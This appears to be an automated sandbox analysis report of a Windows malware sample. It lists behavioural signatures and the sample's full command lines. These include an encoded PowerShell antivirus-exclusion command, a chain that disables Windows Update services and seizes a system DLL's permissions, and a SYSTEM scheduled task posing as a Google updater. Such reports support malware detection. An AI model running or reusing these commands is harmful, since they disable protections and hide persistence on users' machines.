Analysis

Max time kernel: 38s
Max time network: 42s
Platform: windows7_x64
Resource: win7-20220812-en
Resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
Submitted: 23-08-2022 22:15
Static task: static1
Behavioral task: behavioral1
Sample: 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
Resource: win7-20220812-en

General

Target: 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
Size: 1.8MB
MD5: 707de025f2ab727fbb3b33f4ff8b97b3
SHA1: 51a571a425a36cbbc3103d5e9991d080ccd4abc6
SHA256: 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
SHA512: 256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c
SSDEEP: 49152:Y1uZMQTHvWorKzx/L9GJENaYcBLxH030Du:Y1ueoH6xYJEHcU3Z
Signatures

Modifies security service (2 TTPs, 2 IoCs)
Processes:
  reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security
  reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters

Possible privilege escalation attempt (2 IoCs)
Processes:
  PID 1332 takeown.exe
  PID 1936 icacls.exe

Stops running service(s) (3 TTPs)

Modifies file permissions (1 TTPs, 2 IoCs)
Processes:
  PID 1936 icacls.exe
  PID 1332 takeown.exe

Drops file in System32 directory (1 IoCs)
Processes:
  powershell.exe: File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Drops file in Program Files directory (2 IoCs)
Processes:
  3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe: File created C:\Program Files\Google\Chrome\updater.exe
  3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe: File opened for modification C:\Program Files\Google\Chrome\updater.exe

Launches sc.exe (5 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes:
  PID 756 sc.exe
  PID 656 sc.exe
  PID 1860 sc.exe
  PID 632 sc.exe
  PID 1304 sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies registry key (1 TTPs, 9 IoCs)
Processes:
  PID 1076 reg.exe
  PID 1508 reg.exe
  PID 2020 reg.exe
  PID 1476 reg.exe
  PID 860 reg.exe
  PID 1256 reg.exe
  PID 1792 reg.exe
  PID 1012 reg.exe
  PID 1844 reg.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  PID 824 powershell.exe
  PID 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  PID 824 powershell.exe: Token: SeDebugPrivilege
  PID 1332 takeown.exe: Token: SeTakeOwnershipPrivilege
  PID 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe: Token: SeDebugPrivilege

Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 824 (powershell.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 824 (powershell.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 824 (powershell.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1708 (cmd.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1708 (cmd.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1708 (cmd.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 756 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 756 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 756 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 656 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 656 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 656 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1860 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1860 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1860 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 632 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 632 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 632 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1304 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1304 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1304 (sc.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1076 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1076 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1076 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1508 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1508 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1508 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1256 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1256 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1256 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1792 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1792 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1792 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 2020 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 2020 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 2020 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1332 (takeown.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1332 (takeown.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1332 (takeown.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1936 (icacls.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1936 (icacls.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1936 (icacls.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1540 (cmd.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1540 (cmd.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1540 (cmd.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1764 (cmd.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1764 (cmd.exe)
  PID 2000 (3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe) wrote to memory of PID 1764 (cmd.exe)
  PID 1540 (cmd.exe) wrote to memory of PID 1316 (schtasks.exe)
  PID 1540 (cmd.exe) wrote to memory of PID 1316 (schtasks.exe)
  PID 1540 (cmd.exe) wrote to memory of PID 1316 (schtasks.exe)
  PID 1764 (cmd.exe) wrote to memory of PID 336 (schtasks.exe)
  PID 1764 (cmd.exe) wrote to memory of PID 336 (schtasks.exe)
  PID 1764 (cmd.exe) wrote to memory of PID 336 (schtasks.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1012 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1012 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1012 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1476 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1476 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1476 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1844 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1844 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 1844 (reg.exe)
  PID 1708 (cmd.exe) wrote to memory of PID 860 (reg.exe)
Processes

Level 1: C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  Level 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\system32\sc.exe
      Command line: sc stop UsoSvc
      - Launches sc.exe

    Level 3: C:\Windows\system32\sc.exe
      Command line: sc stop WaaSMedicSvc
      - Launches sc.exe

    Level 3: C:\Windows\system32\sc.exe
      Command line: sc stop wuauserv
      - Launches sc.exe

    Level 3: C:\Windows\system32\sc.exe
      Command line: sc stop bits
      - Launches sc.exe

    Level 3: C:\Windows\system32\sc.exe
      Command line: sc stop dosvc
      - Launches sc.exe

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      - Modifies registry key

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      - Modifies registry key

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      - Modifies security service
      - Modifies registry key

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      - Modifies registry key

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      - Modifies registry key

    Level 3: C:\Windows\system32\takeown.exe
      Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    Level 3: C:\Windows\system32\icacls.exe
      Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      - Possible privilege escalation attempt
      - Modifies file permissions

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      - Modifies registry key

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      - Modifies registry key

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      - Modifies registry key

    Level 3: C:\Windows\system32\reg.exe
      Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      - Modifies registry key

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

  Level 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
      - Creates scheduled task(s)

  Level 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"